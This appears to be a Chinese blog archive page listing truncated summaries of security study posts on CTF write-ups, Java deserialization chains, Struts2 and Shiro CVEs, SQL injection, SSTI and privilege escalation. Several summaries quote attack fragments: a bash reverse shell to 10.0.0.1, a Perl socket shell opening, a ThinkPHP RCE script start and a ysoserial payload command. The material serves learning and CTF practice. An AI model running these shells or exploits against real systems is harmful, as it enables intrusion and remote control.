04 2022 档案
摘要:搬一下文章到CSDN(说是搬家其实两个平台都不怎么发文章, 就是现在突然饮血来潮弄一下,两个平台都上传一份吧hh
阅读全文
摘要:socketの应用 : Proxy&http-send 下面是几个socket的常用方式, 模板都是网上扒拉其他师傅的, 一直都是直接import使用的, 因为是太久之前的事了, 就不找师傅们的原文了, 见谅。 请求转发 不管发过来的请求是什么最终都请求一个文件包数据并返回 #!/usr/bin/p
阅读全文
摘要:一些编码有关的HTTP报头 Transfer-Encoding Transfer-Encoding只有一个取值那就是chunked,如果赋值了的话那就表示分块编码传输, Content-Length不确定,会在块尾 在早年间的设计里,和内容编码使用 Accept-Encoding来标记客户端接收的压
阅读全文
摘要:[强网杯2021] 复现 | BUU 昨天+今天做这个主要是因为准备跟学长做的一个项目是污染分析的,然后就想到了去年的强网杯,当时用正则做了很久最后也没得到POP链,在事后也没去做复现,看到BUU有题目环境就都复现了一遍。做完了之后最大的感受就是:太顶了,可惜之前赛后没做好复现,错过了好多知识点。
阅读全文
摘要:*CTFのWP&复现 这次比赛又学到了不少的学东西, 但可惜的是自己做最后也只出了两道, 剩下的lotto-erverse和notepro都是遇到一些坑和知识盲区所以都半路夭折了。离谱的是因为前一天晚上因为想把Fastjson的一个小系列全部源码运行过程跟完一遍所以直接通宵了, 比赛那天睡到五点多才
阅读全文
摘要:Java反序列化(十二) | Fastjson②1.2.24-68总结 介绍什么的就不说了,简介以及1.2.24的复现和详细分析可以看 Java反序列化(十) | Fastjson - CVE-2017-18349 需要注意的是在java版本大于1.8u191之后版本存在trustCodebaseU
阅读全文
摘要:Java反序列化(十一) | Fastjson - CVE-2020-12762 从 0.14 到 0.14 的 json-c 具有整数溢出和通过大型 JSON 文件的越界写入,如 printbuf_memappend 所示。 坑...不填了
阅读全文
摘要:Java反序列化(十) | Fastjson - CVE-2017-18349 Fastjson和Jackson这两个版块的都是由于反序列化json数据导致漏洞形成, 而且Fastjson有很多版本的绕过,在这里就先开始学习Fastjson的两个CEV, 后续对不同版本的绕过再总结一下, 网上已经有
阅读全文
摘要:学习Spring源码分析 经过周末两天对源码的学习只能说千万别扣细节,那简直就是一个无底洞,现在已经被劝退了。这个文章就是一些资料和零散的学习笔记,属实没时间精力去完善整理这两天学习的东西了。 B站学习链接 一些知识流程图 Main函数 我们直接在整个项目的第一步main函数的第一句开始打断点进
阅读全文
摘要:SpringMVC架构 DispatcherServlet:前端控制器 用户请求到达前端控制器,它就相当于mvc模式中的c, dispatcherServlet是整个流程控制的中心,由它调用其它组件处理用户的请 求,dispatcherServlet的存在降低了组件之间的耦合性。 HandlerMa
阅读全文
摘要:CVE-2018-11776 | Struts2-057 | 远程代码执行漏洞 影响版本 Apache Struts 2.3–Struts 2.3.34 Apache Struts 2.5–Struts 2.5.16 POC工具: https://github.com/ym2011/POC-EXP/
阅读全文
摘要:CVE-2019-0230 | Struts2-059 远程代码执行漏洞 2020年8月13日,Apache官方发布了一则公告,该公告称Apache Struts2使用某些标签时,会对标签属性值进行二次表达式解析,当标签属性值使用了%{skillName}并且skillName的值用户可以控制,就会
阅读全文
摘要:CVE-2020-13933 | Shiro权限绕过漏洞 这次调试查看Shiro权限绕过漏洞可以说是在于开始对Java的部署和调试开始得心应手起来了,相比这个漏洞而言,感觉这次学习让我对Java分析思路的了解是更加重要的,跟了这个漏洞之后再去学习其它的Shiro-CVE和Fastjson还有JSON
阅读全文
摘要:Shiro漏洞CVE总结合集 这里对Shiro的漏洞CVE做了一些归纳整理,主要两个方面: 1.加密方式可知被使用加密数据反序列化 2.Spring与Shiro对URL匹配规则的差异导致权限绕过 CVE-2016-4437 影响版本: Apache Shiro<1.2.5 当未修改用于“rememb
阅读全文
摘要:Shiro未授权漏洞解析环境搭建 为了深入了解一下这个漏洞的原理花了我好多时间, 又是麻麻的一次学习, 在这里先说一下怎么把环境搭起来吧, 网上很多漏洞解析文章但是搭建环境总是出现这样那样的问题, 先说一下, 完全照着操作也不一定能成功跑起来。我也是按照别人的指南部署项目之后还是运行失败, 最后自己
阅读全文
摘要:CommonsBeanutilsShiro 需要知道 我们使用优先队列构造的CommonsBeanutils链默认情况下是需要依赖CC包的, 所以在Shiro原生的情况下我们需要对初步构造的CB链进行一些修改 ysoserial 中的CommonsBeanutils1.java我们是不可用的, 因为
阅读全文
摘要:CommonsBeanutils 其实前面的CommonsBeanutilsShiro已经使用了一遍了, 但是想了想CB链还是值得拥有自己的一篇的文章的所以就再分析了一遍。 Gadget java.util.PriorityQueue.readObject java.util.PriorityQue
阅读全文
摘要:Shiroの起始篇(环境搭建+原理分析) 这几天都在做Shiro的复现学习, 原理并不复杂, 但是因为太久没使用Java所以导致出现的一些环境问题直接把我给整晕了, 几乎一半的时间是用来调环境的, 在这里记录一下吧 这篇文章主要内容分为两个部分: Shiro漏洞原理和漏洞源码解析 环境搭建+坑点 一
阅读全文
摘要:CommonsCollectionsShiro CommonsCollectionsShiro单纯是CC链为了满足一些Shiro的反序列化条件而拼接改造的CC链, 所以具体详细过程就不展开分析了, 直接给Gadget和不同CC链的分区, 结合payload生成源码分析即可 CC1+CC6+CC3 W
阅读全文
摘要:java反序列化(五)CommonsCollections篇 — CC3 CC3与CC1的关系 CC3怎么说呢嗯嗯嗯,,,,,感觉和CC1区别不是很大,最大的不同点在于CC3是通过动态加载类之后将类实例化导致代码执行 通过ClassLoader.defineClass()动态加载类,通过newIns
阅读全文
摘要:CC1 plus(不受jdk版本限制) 前文所分析利用的CC1链会受到jdk的版本限制 受jdk版本限制原因: 在jdk1.8.0_71之后的版本AnnotationInvocationHandler.readObject()均被重写,删掉了其中的menbervalue.setValue()执行代码
阅读全文
摘要:利用流程 可通过java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS "http://host" > payload.bin生成payload 测试 : python exploit_deserlab.py [host] [port] payload.b
阅读全文
摘要:java反序列化(三)CommonsCollections篇 -- CC1 前言 Commons Collections的利用链也被称为cc链,在学习反序列化漏洞必不可少的一个部分。Apache Commons Collections是Java中应用广泛的一个库,包括Weblogic、JBoss、W
阅读全文
摘要:序列化和反序列化 序列化 将一个类对象转换成为一段字节序列保存在文件中,和java的原生类writeObject对应 反序列化 将对象序列化生成的字节序列还原为一个对象,和java的原生类readObject对应 序列化条件 该类必须实现 java.io.Serializable 对象 该类的所有属
阅读全文
摘要:探究CC链的前置知识 这里是各种探究CC链的过程中使用到的类的详细讲解,一边探究CC链一边把Gadget chain出现的类补进来 ..... CommonsCollections Transformer Transformer为Commons Collections中提供的一个接口 Const
阅读全文
摘要:关系规范化理论 | 数据库原理 虽然但是吧...... 这节课学习的内容在实践中基本不会用到这些概念, 不过感觉如果想深入了解数据库的底层特别是看数据库的底层数据操作函数源代码, 特别是想要了解其处理逻辑的原则, 那么这些概念应该还是很有参考性的. 所以就记了这篇文章了 泛关系模型 简单说就是全部数
阅读全文
摘要:MYSQL注入中information_schema的替代 复现去年强网杯的Torando的时候看到用了两个平时不常用的表,所以我就去翻了一遍Mysql的默认表看看还有没有可用的,结果发现其实还有很多之前从没使用过的"漏网之鱼",在这里记录一下。 Mysql版本: 5.7.26 数据库结构: 先罗列
阅读全文
摘要:Mysql注入的新大陆 经过昨天寻找information_schema的替代表之后我又去翻了一遍Mysql的内置函数,也还是有不少新发现的,另外再简单写了一下之前早就有的一个想法,使用字符串的匹配函数+替换函数绕过常用的Mysql注入函数WAF去匹配字符串,现在看来理论上是可行的,但是没动手写代码
阅读全文
摘要:可变分区内存管理 | 操作系统 操作系统的内存管理——Is——Interesting——?? 动态内存分配算法(连续内存) 这里的连续内存所说的连续有否指的是一个进程在内存中的数据存储是否是连续的。 首次适应算法(FF) 将所有空闲分区按照地址递增的次序链接,在申请内存分配时,从链首开始查找,将满足
阅读全文
摘要:CVE-2021-4034 pkexec本地提权漏洞 这个漏洞早在去年的时候就看过一些文章了, 不过一直都没用过这个漏洞的打法, 直到昨天的DASCTF才上手用了这个漏洞的一小段原理, 今天就写一篇关于这个漏洞的文章吧。 漏洞简介 NVD对这个漏洞的描述如下: 在polkit的pkexec工
阅读全文
摘要:PHP filter_var 函数绕过 今天在日报看到了有关PHP函数绕过的文章就去学习了一下,但是有点尴尬的是文章是纯英文的直接翻译有很多地方会导致理解出问题,所以最后硬着头皮通过看原文学习, 所以这也可以说是一个简单的翻译文章吧, 原文见PHP filter_var shenanigans 。
阅读全文
摘要:初探Django框架 innodb引擎engine支持事务操作 只能説菜鸟教程是真的好用, 最近学习的perl,LUA都是在菜鸟教程看的(菜鸟看菜鸟hhh), 虽说内容并没有很深入, 但是也能够达到初步了解的效果了。难受的是因为要测试的网站是通过Django+Nginx+uwsgi搭建的, 直接看源
阅读全文
摘要:DASCTF X SU 2022 writeup 有一说一, 其实这个比赛我是结束之后再做的题目(有别的事忘了有比赛了), 直到晚上快十点多的时候忙完了之后上BUU才看到这个比赛, 进去发现也还是可以注册做题的就肝到了十二点多, 最后只出了Calc就去睡觉了, 不过今天起来之后发现昨天做EZPO
阅读全文
摘要:HFCTF2022-babysql 这个题目的过滤: const r = str .replace(/[\s,()#;*\-]/g, '') .replace(/^.*(?=union|binary).*$/gi, '') .toString(); 其实就是 不能使用() 不能使用* - ; # (
阅读全文
摘要:Python沙箱逃逸 这个话题网上已经有相当多的文章了, 记得我第一次遇到Python沙箱的问题还是去年的校赛的时候, 但是到现在已经很久没有见到过Python沙箱的问题出现了。不过刚好前段时间的Flask模板注入这个契机让我想到了这个问题, 感觉两者还是有一些相似的地方的, 所以就趁热打铁再展开一
阅读全文
摘要:学习数据库原理查询语句后的Mysql注入思考 今天《数据库原理》课上学习了Mysql查询语句, 发现有几个语句是可以作为SQL注入if函数取代的参考点, 记录一下: 0x01 between < arg1> and < arg2> 这个就一普通的判断语句, 就不需要再说的了吧, between an
阅读全文
摘要:HFCTF 2022-EZPHP 这次的虎符虽说让我坐牢了两天,但是亦可说是收获满满, 这次比赛Web的题目共有4道, 但是我觉得EZPHP还是值得单独记录的, 因为这个题目可以说是一个让我受益匪浅的组合拳的类型, 也给我带出了两个新的LFI方法 和一些Nginx的知识: Nginx-fastc
阅读全文
摘要:CVE-2022-0543复现 | redis的远程代码执行漏洞 0x01描述 披露时间: 2022.3.8 影响范围 : Debian 系的 Linux 发行版本 + Ubuntu CVE-2022-0543 该 Redis 沙盒逃逸漏洞影响 Debian 系的 Linux 发行版本,并非 Red
阅读全文
摘要:Gopher协议的妙用 什么是gopher协议? Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。允许用户使用层叠结构的菜单与文件,以发现和检索信息,它拥有世界上最大、最神奇的编目。 Gophe
阅读全文
摘要:[蓝帽杯 2021]One Pointer PHP 虽然这个比赛只有一个Web题但是质量确实挺高的,值得用一篇文章来记录一下 这道题主要核心内容就是打PHP-FPM服务的原理和方法 One Pointer PHP 解题步骤 设置数组溢出 使用FTP被动连接打php-FPM SUID提权 0x01 P
阅读全文
摘要:如何利用环境变量注入执行任意命令 这篇文章单纯就是学习我是如何利用环境变量注入执行任意命令的一个记录, 当时刚发这篇文章看到就觉得很有意思所以就学习了一下, 但是笔记文章写到一半就搁置下来了, 结果没想到今天的虎符HFCTF-2022的EZPHP就用到了, 所以就把文章继续写完了, 但是让人尴尬的是
阅读全文
摘要:渗透测试怎么利用Redis提权 之前就有做过一些redis的题目, 不过一直没去了解过redis的操作命令,结果这次做渗透测试就用到了所以又去学了一遍, 在这里记一下一些常用的操作命令再贴几个提权方式方便以后要使用redis的时候参考吧 以下redis的特性和命令内容均参考于菜鸟教程Redis教程
阅读全文
摘要:Phar的绕过 受害函数 fileatime / filectime / filemtime stat / fileinode / fileowner / filegroup / fileperms file / file_get_contents / readfile / `fopen`` fil
阅读全文
摘要:[HFCTF 2021 Final] | BUU复现 easyflask 直接给出源码: #!/usr/bin/python3.6 import os import pickle from base64 import b64decode from flask import Flask, requ
阅读全文
摘要:CVE-2022-0847-DirtyPipe原理 | 文件覆写提权 一.漏洞描述 CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。 CVE-2022-
阅读全文
摘要:红明谷CTF 2021 | BUU2021CTF复现 [红明谷CTF 2021]write_shell <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|
阅读全文
摘要:文件上传文件名绕过原理 最近学习php的fpm和cgi看到了以前刚开始学习到文件上传时的一些漏洞发生原理,记录一下吧 Nginx(IIS7)解析漏洞 漏洞现象 用户访问http://127.0.0.1/favicon.ico/.php时,访问到的文件是favicon.ico,但却按照.php后缀解析
阅读全文
摘要:Docker的 include $_GET文件包含 这个文章是几个月前一个CTF比赛的wp中用到一个看起来很奇怪的payload就直接执行,后来才发现是p神去年一篇文章Docker PHP裸文件本地包含综述中有说到的, 所以就对这个文章做了一下记录, 笔记都要吃灰了现在还是放上来吧以免以后找不到了
阅读全文
摘要:PHP-FPM && PHP-CGI && FASTCGI CGI 早期的Web服务器,只能响应浏览器发来的HTTP静态资源的请求,并将存储在服务器中的静态资源返回给浏览器。随着Web技术的发展,逐渐出现了动态技术,但是Web服务器并不能够直接运行动态脚本,为了解决Web服务器与外部应用程序(CGI
阅读全文
摘要:SSTI模板注入Plus | Bypass 一些语法: {% ... %} 用来声明变量,也可以用于循环语句和条件语句 {{ ... }} 将表达式打印到模板输出 {# ... #} 未包含在模板输出中的注释 # ... # 和{%%}有相同的效果 例子: {% set x= 'abcd' %} 声
阅读全文
摘要:SSTI 模板注入 | 一个找可利用类的小脚本 运行测试版本 : python3.7.0 flask2.0.3 代码 代码写的有点烂,也有很多冗余代码,不过不想改了,能跑就行,将就着用吧hhhh 运行flask模块 | index.py import flask app = flask.Flask(
阅读全文
摘要:SSTI模板注入 一些概念 模板注入 模板可以理解为是一段固定好格式,并等着你来填充信息的文件,模板注入就是指将一串指令代替变量传入模板中让它执行 装饰器 先了解了一下装饰器的概念 @app.route也是一个装饰器, 作用是把函数和URL绑定 渲染 render_template 用来渲染一个指定
阅读全文
摘要:RPO漏洞攻击 | (一个提交页面+一个文章编辑页面)## 利用条件### 服务器中间件为Nginx或修改配置后的Apache### 存在相对路径的js或者css的引用- 文件代码RPO/index.phphtml<br /><html><body><script sr
阅读全文
摘要:一些攻击方式### 图片(假图片)木马得到一个名为crs.jpg的假图片,打开图片就会运行木马- 通过winrar配置压缩文件- 配置自解压(获得的压缩文件名为Destop.exe) - 配置自解压路径 - 配置解压后执行的程序(执行解压出来的木马) - 隐藏解压过程- 修改后缀名为.scr(或ms
阅读全文
摘要:# Command Bypass | Linux## # 特殊字符作用### `{n}表示输入的第n个参数,0-9不用加{},但是到了10以后就要使用`0 ~
阅读全文
摘要:bypass disable:CVE-2014-6271(Bash破壳漏洞)###### 漏洞范围:GNU Bash 版本小于等于4.3其实现在大多数的服务器的bash版本都超过了4.3,已经对这个漏洞就行了修复也就无法利用了,不过学习了一下这个漏洞也还是记录一下吧###### 漏洞成因:目前的ba
阅读全文
摘要:LD_PRELOAD 后门### 用途主要是用于绕过 disable_functions ,本质上是加载顺序的问题, 动态链接库加载过程中会先加载 LD_PRELOAD 指向的变量,这样我们可以利用这个先加载来进行劫持正常的函数和命令 只要劫持系统命令调用的一个函数就可以在劫持函数任意执行其它函数从
阅读全文
摘要:# python-socket的一些用法# TCP客户端```pythonimport sockettarget_host = "www.ba
阅读全文
摘要:RCE版本范围 : 5.0.1~22```pythonimport requests,timeargs=""data={}# debug=false时无RCE,debug=true时5.0.21~22# data={"_method":"__construct","filter":"system",
阅读全文
摘要:无字母webshell-plus# Pation- 短标签不需要分号闭合?code=?><?=phpinfo()?><?=system("dir")?>- eval执行代码相当于另外生成一个php文件,文件格式为有<?php ..... ?>所以可以通过短标签摆脱;的限制- 异或和或运算时要将两个部
阅读全文
摘要:JavaScript对象# Documetn<br />Document<br /><br />Document 接口表示任何在浏览器中载入的网页,并作为网页内容的入口,也就是DOM 树。DOM 树包含了像 <body> 、<table> 这样的元素,以及大量其他元素。它向网
阅读全文
摘要:# 利用netcat反弹shellNetcat 是一款简单的Unix工具,使用UDP和TCP协议。 它是一个可靠的容易被其他程序所启用的后台操作工具,同时它也被用作网络的测试工具或黑客工具。 使用它你可以轻易的建立任何连接。目前,默认的各个linux发行版本已经自带了netcat工具包,但是可能由于
阅读全文
摘要:Bash 与linux发行版本有关<br />bash -i >& /dev/tcp/10.0.0.1/8080 0>&1<br />## PERL<br />perl -e 'use Socket;p=1234;socket(S,PF_IN
阅读全文
摘要:@propertypyton内置的@property装饰器可以把一个方法变成一个属性python<br />class User:<br /> def __init__(self):<br />  
阅读全文
摘要:# CSRF 跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF。 CSRF是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨站脚本
阅读全文
摘要:什么是软链接?<br /> 软连接是linux中一个常用命令,<br /> 它的功能是为某一个文件在另外一个位置建立一个同步的链接。<br /> 软连接类似与c语言中的指针,传递的是文件的地址;<br /> 更形象一些,软连接类似于WINDOWS系统中
阅读全文
摘要:一个很久之前学习mysql注入的笔记#### (1)增删改查语句1. Insert : insert into mrkaixin values( ' 1’ , ' nepnep');2. Delete : delete from mrkaixin where xXXX;3. Update : upd
阅读全文
摘要:是从深育杯一道mysql注入知道的使用示例 详细讲解<!--more--> 使用条件: 可以使用堆叠注入或slow_query_log开启(默认是关闭的) slow_query_log为慢查询记录开关 slow_query_log_file是查询语句的记录文件地址 以上参数参数可以通过set语句直接
阅读全文
